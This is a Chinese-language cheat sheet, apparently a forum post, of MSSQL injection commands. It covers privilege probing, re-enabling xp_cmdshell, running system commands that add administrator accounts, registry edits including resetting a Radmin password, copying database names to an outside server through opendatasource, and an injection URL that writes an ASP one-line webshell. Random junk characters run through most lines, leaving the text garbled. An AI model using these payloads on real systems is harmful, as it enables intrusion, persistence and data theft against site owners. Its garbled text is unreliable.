阿D常用的一些注入命令
6 V) H: j" G' V, O4 i* G+ { Z//看看是什么权限的
- G& o- k+ R' B, Aand 1=(Select IS_MEMBER('db_owner'))- U5 T, D) N& m
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--5 \3 P6 t* y2 z0 F- _5 M) {
& D( {$ [/ }# x* P//检测是否有读取某数据库的权限
$ e" s( ~6 V# i* Gand 1= (Select HAS_DBACCESS('master'))
7 W2 }' }8 v4 o- }( TAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
" K/ m0 @+ c" `' L. r+ Y2 K5 T6 I0 Z8 d5 [6 y
# r1 k/ R! a' P
数字类型
9 [. N5 @0 o P) |) f7 y2 Uand char(124)%2Buser%2Bchar(124)=0 E8 g. w8 C5 T2 K/ |3 @3 y
+ X) N/ e; K0 }) l" ^( { Z+ P. W字符类型. H& r5 Y* m% _9 [
' and char(124)%2Buser%2Bchar(124)=0 and ''='8 G$ v5 n( F1 c5 F: r4 i" c
+ a- d4 e/ p' p搜索类型! {7 F$ ^: u, h" M
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
* C: t1 u. M3 K2 M% U3 r1 h% f9 b# s3 r
爆用户名! f( u" z7 W+ b6 h* R X' {
and user>0
, F2 g ^2 {- G/ B' n" W% C' and user>0 and ''='
- x/ j# r0 W/ w% U. G3 y
% e& p+ f' G- P, N( v3 @检测是否为SA权限
3 j, o1 U- V. t! |and 1=(select IS_SRVROLEMEMBER('sysadmin'));--: X& I7 O5 ~; D1 ?- a
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --! ?( h% E: n% z% K4 z: _! A
( U7 ?5 E9 j9 a检测是不是MSSQL数据库4 W% Q4 U) S2 I7 A- o, v
and exists (select * from sysobjects);--
+ Y5 w/ R" L& E6 a, J3 b; K8 O3 @3 |
: j' J( S: |$ _% `! B检测是否支持多行, P- E) V+ F3 F8 W. D
;declare @d int;-- 7 K+ p) M4 w) v# d
+ z7 `9 S' x' r恢复 xp_cmdshell( o, t. Q+ Y* T0 ]% G
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--1 j) v' ~/ {* H) R. p
* R/ l' i8 }4 ^% Z i2 l& h6 `! Y7 A) @
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
8 {% t3 j3 e/ ]8 X) }8 Z
, I0 K# Q5 }' y9 [8 k9 k ]//-----------------------9 ?9 ~$ J0 i9 l4 ^$ {! c
// 执行命令
/ G* b/ [. Y$ y. D3 p x: `- x//-----------------------$ L8 Z A. J- F( [7 J* b* D* m
首先开启沙盘模式:
5 W8 g6 u) U6 B0 n, Xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 q3 K5 t$ I( D: b7 t$ w
[1 E3 C5 M5 z( g) v然后利用jet.oledb执行系统命令
# }) n+ H2 x6 a$ J" w0 Iselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. l% d% O3 G& U5 @; u0 v- ^% R& a/ M+ b4 J" j; p
执行命令
, i- h% a/ N* i0 b' U7 |;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--% b( B. w, z! G. k% O. M
/ |# n' A# Y( Z: a0 V
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'7 N1 P" W. V( n: v" b/ W& B% S
+ L0 @+ d& K; s2 u
判断xp_cmdshell扩展存储过程是否存在:2 j) A9 a0 R A$ x4 ?% |4 n$ B; ~
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')& b) O% b. t% E/ a3 Z' m! S
& N+ w8 l( @0 @0 {0 p% H& b写注册表! d3 ? w/ L3 b, Y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( r( W, b$ H* N7 n/ E
+ ]- _! N+ y5 l3 o8 e, dREG_SZ8 B+ f9 M/ S/ D3 X" Z1 V
2 ?! Y3 h& {7 ]2 `- r读注册表
$ }; v- U( l: n% m9 Cexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
3 o5 C2 K6 Q( `, k; |+ |3 f/ F, C; q- ^+ ?/ J- }8 Y; Z) L
读取目录内容# `, z# \+ \7 n/ n4 E. }$ T8 s. k
exec master..xp_dirtree 'c:\winnt\system32\',1,1
6 }) z6 |; G4 d
1 W. V+ K) s# `& L _
9 S: T0 |5 A: \1 \0 f! T. m数据库备份
) {+ [- e: H" r% N9 z8 b6 w( xbackup database pubs to disk = 'c:\123.bak'
/ @1 u- V* t, ~, U) C, K' h
8 e# Z1 M3 h# b//爆出长度
; r; w' \ h! ~8 R' iAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
L: M3 n0 q. s# V! E) N J9 W1 @+ B* s3 N, x
. {; m. ~% ?0 P$ T* Y1 `
1 B {# z8 Y6 n$ a0 j! `) ^更改sa口令方法:用sql综合利用工具连接后,执行命令:
! b# \% A) X: R5 L. _, mexec sp_password NULL,'新密码','sa') `6 T+ V6 s% y! F! K2 ^
: a4 u" w# k9 H. B
添加和删除一个SA权限的用户test:
3 f% g9 c) d7 C' lexec master.dbo.sp_addlogin test,ptlove
: D! ^$ O! | g- v1 m3 N/ t) [exec master.dbo.sp_addsrvrolemember test,sysadmin/ M7 f1 I$ y# _% I" q
6 Z0 p. i% C+ J! \! _4 v0 J6 I
删除扩展存储过过程xp_cmdshell的语句:
# k- \8 y* v, V& ^$ b" P. rexec sp_dropextendedproc 'xp_cmdshell'4 I8 c7 r. Q0 A4 D" l5 D
: h, _. Y4 j# M9 z# i7 W
添加扩展存储过过程
. y; W- \6 m7 dEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
# P& L8 S: u; ~( C) x6 CGRANT exec On xp_proxiedadata TO public
1 B+ A# j' D/ y3 [" i* |3 ^# d
; w7 w$ E& H9 x; P8 w- A! K0 ^: |6 d7 J _, Q4 s
停掉或激活某个服务。
( Q6 V* S$ L* S& u
- O6 k) d9 }- a5 E( `exec master..xp_servicecontrol 'stop','schedule'5 T3 S( `& ?' Z' M/ P
exec master..xp_servicecontrol 'start','schedule'0 |* [4 l( J# x5 n+ V
/ ^8 e2 Q5 l9 V/ t6 \& {0 P
dbo.xp_subdirs
( F# X$ T) }( ^7 b. _' [# k
* O9 J# n9 o( ?( l# w- W7 M A+ w9 |只列某个目录下的子目录。
7 S: e1 ?/ T2 J- axp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
" H; q* i _: ^0 D& _/ s* l
+ Y6 C' Z4 N6 W4 ?, {* gdbo.xp_makecab& L: Z7 n" {% |$ s; K/ _
( l1 _8 p& M" t. t( L' z将目标多个档案压缩到某个目标档案之内。
' z( Q% e/ F( U* i所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。9 |% D, ]( ~3 i( L) ?( x
( J W6 y s: V+ V }4 x; I4 pdbo.xp_makecab
( ]) W) {0 O3 S4 a1 v- X( F'c:\test.cab','mszip',1," h4 I* y/ o/ W) B4 c$ z. }
'C:\Inetpub\wwwroot\SQLInject\login.asp',$ G3 j2 @! {- [3 W
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ B- s* |: i/ l2 d D8 m4 K% I" a2 a" R, [: e. M U& q
xp_terminate_process. S, b9 p8 b1 l: c: j+ F. D, @
5 Y' d4 R- U5 m停掉某个执行中的程序,但赋予的参数是 Process ID。
7 ^" J- J' n0 r0 M; x利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID5 y: n7 J, B7 G# M1 }- E4 d/ h7 u
0 [! o, s1 @& z! o6 j5 r2 l* V6 D2 m
xp_terminate_process 2484- v7 |) C8 w: f0 W4 }. _
9 [0 U; a7 W2 W! G$ s( |. l
xp_unpackcab
+ @- u8 M* t/ }+ |2 Y# X7 @ @/ }7 L& `% O, f* b
解开压缩档。8 A' B/ I& g8 a% S0 d
4 W5 N) B2 _( ^- N: S( B3 Pxp_unpackcab 'c:\test.cab','c:\temp',17 o0 x" M4 v( w8 }
) F: M) ]5 x1 k
2 d6 L& [. |) Z6 `2 b1 d
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
6 w7 F, b) P5 H, @+ J: d; @' W4 ]' k/ X4 m9 h, ^' }$ J# g
create database lcx;& {9 U' n: k+ {& N1 G3 f# n; V9 a# w
Create TABLE ku(name nvarchar(256) null);
7 q3 w8 q! S/ B7 h" h9 X( F7 QCreate TABLE biao(id int NULL,name nvarchar(256) null);
0 m2 Y: _! q7 M! r$ x$ }* b& q( {
) X4 Q0 [. j2 N+ R: H//得到数据库名
4 t& p9 y/ g* z9 t/ ?% }insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
7 N5 S! H! v$ n L5 n) v
! F+ J6 |3 V* Q$ G, {1 Y+ g
3 j5 E% m( z3 U E. X5 j' G! Q/ @' F//在Master中创建表,看看权限怎样
' | Z0 x3 p0 [" ^! L2 `3 bCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
* i; B2 V5 ^6 b! l
3 N9 W# ~% I3 r& k- Q3 k用 sp_makewebtask直接在web目录里写入一句话马:/ i7 ]1 C# Y9 R5 s# P O7 d1 D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
) h3 y2 n# ?9 R! q: t* ~" I! G; t. T4 c8 E1 Q+ w; u
//更新表内容1 R. G3 x1 e9 c' k) [
Update films SET kind = 'Dramatic' Where id = 123
0 H" m1 T7 m) v) @3 R: A# T% \; q; \' {
//删除内容
Y# v8 |+ n9 D6 Q% @5 n3 y" `delete from table_name where Stockid = 3 |